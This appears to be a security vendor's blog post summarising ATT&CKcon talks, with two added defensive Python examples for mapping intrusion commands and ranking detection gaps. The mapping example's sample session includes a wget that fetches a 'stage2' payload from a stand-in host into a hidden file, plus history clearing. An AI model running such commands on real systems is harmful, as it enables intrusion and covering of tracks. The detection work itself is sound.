The MITRE ATT&CK framework needs no introduction. Over 80 percent of enterprises use ATT&CK, according to a 2020 study. First introduced in 2013, the framework established a standard for the infosec community to describe adversary tactics and techniques. There are now separate matrices for Enterprise, Mac/Linux, Cloud, ICS, Mobile, and Defense, and each of these matrices has grown in complexity over time. The framework has evolved significantly over the years, adding new techniques, sub-techniques and mitigations to track shifts in adversary tactics. Take Resource Hijacking, for example. The technique was added in 2019 to classify the rising number of cryptojacking attacks, which ride on two megatrends in technology: cloud computing and cryptocurrency.
The ATT&CK framework has use cases in adversary emulation, threat intelligence, and detection and analytics. It’s built into D3’s Smart SOAR platform as well. In fact, we were the first SOAR vendor to fully embed the MITRE ATT&CK matrix. Our global event playbook parses MITRE TTPs from security events ingested by the platform, enabling kill chain-based threat hunting.
After a gap of nearly three years, MITRE held its third ATT&CKcon conference at the end of March. The two-day conference saw 72 presentation submissions from 16 countries – only 17 were selected by the program committee. Storytelling was one of the big themes of the conference. A number of talks focused on the importance of effective communication, and on how the MITRE framework can help SecOps teams explain adversary campaigns and intent efficiently. With much of the audience attending remotely, the conference generated plenty of wit and banter on Twitter, thanks to a meme contest.
If you were too busy to follow the conference, these are our picks for the most interesting presentations that are worth a watch.
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interactive Intrusion Campaigns
Jason Wood and Justin Swisher, Senior Researchers at CrowdStrike, provide a detailed breakdown of an interactive intrusion campaign against a Linux endpoint, based on real-world threat data. It is a fascinating look at how threat actors use the command line to build an understanding of the host and its surrounding infrastructure, and at how they try, and often fail, over attack campaigns that last for days or weeks.
The presenters map individual command lines typed by the adversary to procedures, sub-techniques, techniques, and tactics. Taking inspiration from the book Start with Why by Simon Sinek, they try to understand adversarial intent and the techniques that are working for them.
“Every time an adversary runs a command, they tell us something about themselves, about what they’re trying to do,” says Jason. From activity logged across more than a thousand hands-on-keyboard intrusions and mapped to ATT&CK, they try to understand how attack trends have changed over time. This gives them a better understanding of the techniques adversaries rely on and lets them identify coverage gaps where detection could be improved.
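The mapping the presenters describe, from an individual command line up through procedure, technique and tactic, can be sketched in a few dozen lines. The block below is an added example written for this post, not code from the CrowdStrike talk: the session log is constructed, the regex "procedures" are my own, and only the ATT&CK technique IDs, names and tactics in the lookup table are real.

```python
"""Map adversary command lines from a Linux intrusion session to ATT&CK.

Added example, not from the CrowdStrike presentation. The SESSION log and the
PROCEDURES patterns are constructed for illustration; the technique IDs, names
and tactics in TECHNIQUES are real ATT&CK entries (a small subset I chose).
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Technique:
    tid: str      # ATT&CK technique or sub-technique ID
    name: str
    tactic: str


# Real ATT&CK IDs/names; the subset is chosen for a Linux host.
TECHNIQUES = {
    "T1082": Technique("T1082", "System Information Discovery", "Discovery"),
    "T1033": Technique("T1033", "System Owner/User Discovery", "Discovery"),
    "T1057": Technique("T1057", "Process Discovery", "Discovery"),
    "T1016": Technique("T1016", "System Network Configuration Discovery", "Discovery"),
    "T1083": Technique("T1083", "File and Directory Discovery", "Discovery"),
    "T1105": Technique("T1105", "Ingress Tool Transfer", "Command and Control"),
    "T1053.003": Technique("T1053.003", "Scheduled Task/Job: Cron", "Persistence"),
    "T1070.003": Technique("T1070.003", "Indicator Removal: Clear Command History", "Defense Evasion"),
}

# "Procedure" patterns: a regex over the command line -> technique ID.
# First match wins, so order matters. These patterns are constructed, not exhaustive.
PROCEDURES = [
    (re.compile(r"^(uname|hostname|cat /etc/(os-release|issue))\b"), "T1082"),
    (re.compile(r"^(id|whoami|w|who)\b"), "T1033"),
    (re.compile(r"^(ps|top)\b"), "T1057"),
    (re.compile(r"^(ifconfig|ip (a|addr)|netstat|ss)\b"), "T1016"),
    (re.compile(r"^(ls|find|locate)\b"), "T1083"),
    (re.compile(r"^(curl|wget)\b.*https?://"), "T1105"),
    (re.compile(r"^crontab\b|/etc/cron"), "T1053.003"),
    (re.compile(r"^(history -c|unset HISTFILE)"), "T1070.003"),
]

# Constructed session log: commands in the order the operator typed them.
SESSION = [
    "uname -a",
    "cat /proc/cpuinfo",          # deliberately has no pattern -> shows a mapping gap
    "id",
    "cat /etc/os-release",
    "ps aux",
    "ip addr",
    "ls -la /home",
    "wget http://example.invalid/stage2 -O /tmp/.s",   # constructed, non-routable host
    "crontab -l",
    "history -c",
]


def map_command(cmd: str) -> Optional[Technique]:
    """Return the technique a single command line maps to, or None if no pattern matches."""
    cmd = cmd.strip()
    for pattern, tid in PROCEDURES:
        if pattern.search(cmd):
            return TECHNIQUES[tid]
    return None


def summarize_session(commands: List[str]) -> Tuple[List[Tuple[str, str, str]], Counter, List[str]]:
    """Map every command in a session.

    Returns (timeline, tactic_counts, unmapped):
      timeline      - list of (command, technique ID, tactic) in the order typed
      tactic_counts - how many commands fell under each tactic
      unmapped      - commands no procedure pattern recognised (candidates for new mappings)
    """
    timeline, tactic_counts, unmapped = [], Counter(), []
    for cmd in commands:
        tech = map_command(cmd)
        if tech is None:
            unmapped.append(cmd)
        else:
            timeline.append((cmd, tech.tid, tech.tactic))
            tactic_counts[tech.tactic] += 1
    return timeline, tactic_counts, unmapped


if __name__ == "__main__":
    timeline, tactics, unmapped = summarize_session(SESSION)
    for cmd, tid, tactic in timeline:
        print(f"{tactic:20} {tid:10} {cmd}")
    print("tactic counts:", dict(tactics))
    print("unmapped:", unmapped)
```

Run against the constructed session, the timeline reads as a Discovery-heavy reconnaissance phase followed by tool transfer, a cron check and history clearing; the one unmapped line (`cat /proc/cpuinfo`) is exactly the kind of gap the presenters describe, a procedure the analyst has not yet tied to a technique.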
Intelligence Failures of Lincoln’s Top Spies – What CTI Analysts Can Learn From The Civil War
Selena Larson, Senior Threat Intelligence Analyst at Proofpoint, highlights the importance of vetting your OSINT to eliminate HiPPO (highest paid person’s opinion) bias, and how a failure to do so can literally change the course of history. The presentation draws from historical events – specifically, the intelligence failure of Allan Pinkerton, who served as Union Intelligence Chief under US president Abraham Lincoln from 1861 to 1862. Pinkerton’s reporting tended to be prosaic and flowery, and he exaggerated enemy troop numbers to please his boss. Peppered with snippets from Douglas Waller’s book Lincoln’s Spies, the presentation stresses the importance of validating your sources, using the MITRE ATT&CK framework, and practicing BLUF (bottom line up front) for effective threat intelligence reporting.
Knowledge for the Masses: Storytelling with ATT&CK!
Trellix’s Ismael Valenzuela, Senior Principal Engineer and Head of the Applied Countermeasures (AC3) team, and Jose Luis Sanchez Martinez, Threat Hunting Specialist, emphasize how critical effective storytelling is to producing impactful threat reports, and how its absence leads to partial understanding and limits defensive actionability. They also stress the importance of telling a story appropriate to the audience: actionable information for SOC analysts and incident responders, operational intelligence for SOC managers, and strategic information for security leaders. They showcase some of their work from AC3 Threat Sightings, a one-year-old initiative with the goal of increasing the understanding of cyber threats using ATT&CK. Some of the examples are illuminating, such as the visualization showing a play-by-play timeline of a ransomware intrusion, made using Gource, an open-source mind-mapping tool. Another example uses Maltego, an OSINT and graphical analysis tool.
Read: 10 Reasons to Use MITRE ATT&CK (and how to get started)
It’s Just a Jump to the Left (of Boom): Prioritizing Detection Implementation with Intelligence and ATT&CK
The presentation by Lindsay Kaye, Director of Operational Outcomes for Insikt Group at Recorded Future, and Scott Small, Senior Threat Intelligence Consultant at Recorded Future, emphasizes the importance of threat intel teams in managing security operations. According to the presenters, intelligence teams are critical to a security maturity journey and to bridging gaps between offensive and defensive security. Tighter feedback loops between intel, offensive and defensive teams provide the quickest and most measurable improvements in security, they say. Using ATT&CK coverage data derived from more than a dozen detection repositories and technologies, they describe the current defensive landscape, give guidance on where to implement behavioral detections, and weigh the operational value of the different types of TTP intelligence sources.
Using the MITRE ATT&CK framework as a lens, the presentation explores the anatomy of a ransomware attack, based on the tactics and techniques adversaries use (Domain Access, Stolen Credentials, Phishing, Purchased Accesses through initial access brokers, etc.). Lindsay says that defenders have many opportunities to develop detection before the Boom – the point at which the ransomware payload is dropped and data is exfiltrated/encrypted. Threat hunters must focus on mitigations at the Lateral Movement, Discovery, Escalation, Persistence, and Reconnaissance stages.
This presentation was particularly actionable because it released an open-source tool intended to speed up the identification and closing of control gaps. The tool, called Control Validation Compass, helps defenders search more than 9,000 publicly accessible detection rules and more than 2,100 offensive security tests, aligned with more than 500 ATT&CK techniques and sub-techniques. It is designed to speed up the process of identifying security control gaps and validating the effectiveness of new (or existing) policy and process controls.
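The prioritization logic the talk argues for, rank uncovered techniques by how often intel reports them and favour the stages left of Boom, can be reduced to a small scoring routine. The block below is an added example written for this post; it is not code from the Recorded Future presentation or from Control Validation Compass. The intel counts, the coverage set and the left-of-boom weighting are constructed assumptions; only the ATT&CK technique IDs and tactic names are real.

```python
"""Rank ATT&CK detection gaps by intel frequency, weighted toward left-of-boom tactics.

Added example, not from the Recorded Future talk or Control Validation Compass.
INTEL_COUNTS and COVERED are constructed inputs; the weighting scheme is my own.
Technique IDs and the Enterprise tactic order are real ATT&CK values.
"""
from dataclasses import dataclass
from typing import Dict, List, Set

# ATT&CK Enterprise tactics in kill-chain order. Impact is where the "Boom" lands.
TACTIC_ORDER = [
    "Reconnaissance", "Resource Development", "Initial Access", "Execution",
    "Persistence", "Privilege Escalation", "Defense Evasion", "Credential Access",
    "Discovery", "Lateral Movement", "Collection", "Command and Control",
    "Exfiltration", "Impact",
]
BOOM_INDEX = TACTIC_ORDER.index("Impact")

# Technique -> tactic. Real ATT&CK IDs; the subset mirrors the ransomware chain in the talk.
TACTIC_OF = {
    "T1566": "Initial Access",         # Phishing
    "T1078": "Initial Access",         # Valid Accounts (stolen or purchased credentials)
    "T1021.001": "Lateral Movement",   # Remote Services: Remote Desktop Protocol
    "T1003.001": "Credential Access",  # OS Credential Dumping: LSASS Memory
    "T1482": "Discovery",              # Domain Trust Discovery
    "T1547.001": "Persistence",        # Boot or Logon Autostart Execution: Registry Run Keys
    "T1486": "Impact",                 # Data Encrypted for Impact
    "T1048": "Exfiltration",           # Exfiltration Over Alternative Protocol
}

# Constructed: number of ransomware intrusion reports in which each technique appeared.
INTEL_COUNTS: Dict[str, int] = {
    "T1566": 40, "T1078": 35, "T1021.001": 30, "T1003.001": 28,
    "T1482": 20, "T1547.001": 18, "T1486": 45, "T1048": 25,
}

# Constructed: techniques the SOC already has a behavioral detection for.
COVERED: Set[str] = {"T1566", "T1486", "T1003.001"}


@dataclass
class Gap:
    tid: str
    tactic: str
    observed: int   # how many intel reports featured the technique
    score: float    # observed * left-of-boom weight


def left_of_boom_weight(tactic: str) -> float:
    """Weight earlier kill-chain stages higher: 1.0 at Reconnaissance, 0.1 at Impact (assumed linear)."""
    idx = TACTIC_ORDER.index(tactic)
    return 1.0 - 0.9 * idx / BOOM_INDEX


def prioritize_gaps(intel: Dict[str, int], covered: Set[str], tactic_of: Dict[str, str]) -> List[Gap]:
    """Return uncovered techniques ranked by frequency-weighted, left-of-boom score (highest first)."""
    gaps = []
    for tid, count in intel.items():
        if tid in covered:
            continue                      # already detected, not a gap
        tactic = tactic_of[tid]
        score = round(count * left_of_boom_weight(tactic), 2)
        gaps.append(Gap(tid, tactic, count, score))
    return sorted(gaps, key=lambda g: g.score, reverse=True)


def coverage_ratio(intel: Dict[str, int], covered: Set[str]) -> float:
    """Fraction of observed technique occurrences that already have a detection."""
    total = sum(intel.values())
    return sum(c for t, c in intel.items() if t in covered) / total


if __name__ == "__main__":
    print(f"coverage of observed activity: {coverage_ratio(INTEL_COUNTS, COVERED):.0%}")
    for g in prioritize_gaps(INTEL_COUNTS, COVERED, TACTIC_OF):
        print(f"{g.score:6.2f}  {g.tid:10} {g.tactic:18} seen in {g.observed} reports")
```

With these inputs, Valid Accounts (T1078) tops the list because it is both frequent and early in the chain, while Exfiltration sinks to the bottom despite a healthy report count; that ordering is the point of the weighting. A real deployment would swap the constructed counts for per-technique tallies from intel reporting and the `COVERED` set for rule metadata exported from the SIEM or from a repository search such as the one the tool above performs.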
Read: Four Ways to Leverage MITRE ATT&CK in Your Security Operations
The ATT&CK Latin American APT Playbook
We don’t get to hear much of what’s going on in Latin America, except in the odd news report that notes the region’s abundance of hacking talent. This is exactly why this presentation is a compelling watch. Santiago Pontiroli, Security Researcher at Kaspersky, and Dmitry Bestuzhev, Head of the Global Research and Analysis Team in Latin America at Kaspersky, shed light on some of the more notorious cyber threat actors in Latin America, such as Machete, Poseidon, Blind Eagle, Puppeteer, TA505, and others. These groups range from nation-state actors to mercenaries for hire. The presentation explores the TTPs used by each group and highlights some of the unique and inventive procedures they use, some of which have no ATT&CK technique to map to.
The Next Generation SOAR platform with MITRE ATT&CK Inside
MITRE ATT&CK is fully embedded into D3 SOAR so that you have 20/20 vision of cybersecurity risks affecting your organization at the event and incident level. Our MITRE ATT&CK Monitor provides a global view of attack trends, helping you stay one step ahead of your adversaries. It also includes the ability to create new tactics and techniques for security events that don’t map to the ATT&CK framework. Speak to a specialist to find out how your SOC team can catch threats faster.